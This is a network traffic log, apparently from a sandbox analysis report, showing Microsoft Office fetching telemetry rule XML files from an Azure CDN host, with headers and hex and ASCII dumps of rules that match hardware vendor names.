                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:01 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:01 GMT
                                  Content-Type: text/xml
                                  Content-Length: 632
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                  ETag: "0x8DC582BB6E3779E"
                                  x-ms-request-id: ad5ef595-c01e-0082-42a3-34af72000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154201Z-17df447cdb5w28bthC1DFWgb640000000bwg0000000079kt
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:01 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  22192.168.2.44977013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:01 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:01 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                  ETag: "0x8DC582B9F6F3512"
                                  x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154201Z-16547b76f7fq9mcrhC1DFWq15w0000000fw0000000003uqg
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  23192.168.2.44977413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:02 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:02 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:02 GMT
                                  Content-Type: text/xml
                                  Content-Length: 407
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                  ETag: "0x8DC582BBAD04B7B"
                                  x-ms-request-id: 2e71ae26-601e-0097-6701-2df33a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154202Z-16547b76f7f7lhvnhC1DFWa2k00000000fv0000000000nfy
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  24192.168.2.44977713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:02 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:02 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:02 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                  ETag: "0x8DC582B9018290B"
                                  x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154202Z-16547b76f7frbg6bhC1DFWr5400000000fr000000000fphc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  25192.168.2.44977513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:02 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:02 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:02 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB344914B"
                                  x-ms-request-id: bf72ccbe-301e-001f-25a0-34aa3a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154202Z-17df447cdb5c9wvxhC1DFWn08n0000000cm00000000069vt
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  26192.168.2.44977613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:02 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:02 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:02 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                  ETag: "0x8DC582BA310DA18"
                                  x-ms-request-id: 7c20effc-801e-0015-04a3-34f97f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154202Z-17df447cdb528ltlhC1DFWnt1c0000000bz0000000009ffu
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  27192.168.2.44977813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:03 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:03 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:03 GMT
                                  Content-Type: text/xml
                                  Content-Length: 407
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                  ETag: "0x8DC582B9698189B"
                                  x-ms-request-id: 09da145b-201e-0033-5108-32b167000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154203Z-16547b76f7fcrtpchC1DFW52e80000000fzg0000000009nc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  28192.168.2.44977913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:03 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:03 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:03 GMT
                                  Content-Type: text/xml
                                  Content-Length: 469
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                  ETag: "0x8DC582BBA701121"
                                  x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154203Z-16547b76f7fwvr5dhC1DFW2c940000000fp000000000mb3y
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  29192.168.2.44978113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:03 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:03 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:03 GMT
                                  Content-Type: text/xml
                                  Content-Length: 477
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                  ETag: "0x8DC582BB8CEAC16"
                                  x-ms-request-id: a5c20e25-701e-0050-1ca1-346767000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154203Z-15869dbbcc6khw88hC1DFWbb2000000009wg000000001yua
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  30192.168.2.44978213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:03 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:03 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:03 GMT
                                  Content-Type: text/xml
                                  Content-Length: 464
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                  ETag: "0x8DC582B97FB6C3C"
                                  x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154203Z-16547b76f7f7jnp2hC1DFWfc300000000fvg00000000f1ge
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:03 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  31192.168.2.44978313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:03 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:04 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:04 GMT
                                  Content-Type: text/xml
                                  Content-Length: 494
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                  ETag: "0x8DC582BB7010D66"
                                  x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154204Z-16547b76f7fm7xw6hC1DFW5px40000000fu0000000005mft
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:04 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  32192.168.2.44978513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:04 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:04 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:04 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                  ETag: "0x8DC582B9748630E"
                                  x-ms-request-id: 412bc4a2-301e-0020-47a2-346299000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154204Z-17df447cdb542kkvhC1DFW3d440000000110000000005fyn
